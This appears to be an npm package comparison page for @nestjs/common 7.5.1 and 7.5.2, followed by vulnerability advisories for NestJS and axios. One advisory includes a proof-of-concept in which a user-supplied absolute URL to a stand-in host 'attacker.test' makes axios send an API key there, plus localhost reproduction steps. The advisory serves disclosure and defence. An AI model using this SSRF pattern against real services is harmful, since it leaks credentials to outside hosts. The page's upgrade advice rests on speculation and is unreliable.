NestJS is a progressive Node.js framework renowned for building efficient, reliable, and scalable server-side applications. Versions 7.5.1 and 7.5.2 of the @nestjs/common package, a core module providing essential building blocks for NestJS applications, showcase subtle but potentially impactful differences for developers.
Both versions share identical dependencies, including uuid for generating unique identifiers, axios for making HTTP requests, tslib for TypeScript helper functions, and iterare for improved iteration. They also maintain the same peer dependencies, requiring rxjs (version 6 or higher) for reactive programming and reflect-metadata for metadata reflection. The developer also has access to the same license MIT, the same repository, the same author and funding options.
However, the key distinction lies in the release date and unpacked size. Version 7.5.2 was released on November 13, 2020, while version 7.5.1 was released on November 2, 2020. Furthermore, version 7.5.2 exhibits a slightly larger unpacked size (305721 bytes) compared to version 7.5.1 (305170 bytes). This minor increase suggests potential bug fixes, performance improvements, or minor feature additions in version 7.5.2.
For developers, the 7.5.2 version is the better choice that offers a more refined and stable experience, incorporating any improvements made since the 7.5.1 release. While the changes might be incremental, staying up-to-date with the latest patch version ensures that developers benefit from the most current enhancements and fixes available within the @nestjs/common package.
All the vulnerabilities related to the version 7.5.2 of the package
nest allows a remote attacker to execute arbitrary code via the Content-Type header
File Upload vulnerability in nestjs nest prior to v.11.0.16 allows a remote attacker to execute arbitrary code via the Content-Type header.
Axios vulnerable to Server-Side Request Forgery
Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.
axios Inefficient Regular Expression Complexity vulnerability
axios before v0.21.2 is vulnerable to Inefficient Regular Expression Complexity.
Axios Cross-Site Request Forgery Vulnerability
An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Consider the following code snippet:
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.
It is recommended that:
baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.Follow the steps below to reproduce the issue:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
$ node main.js
this is server2
Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.
baseURL and does not validate path parameters is affected by this issue.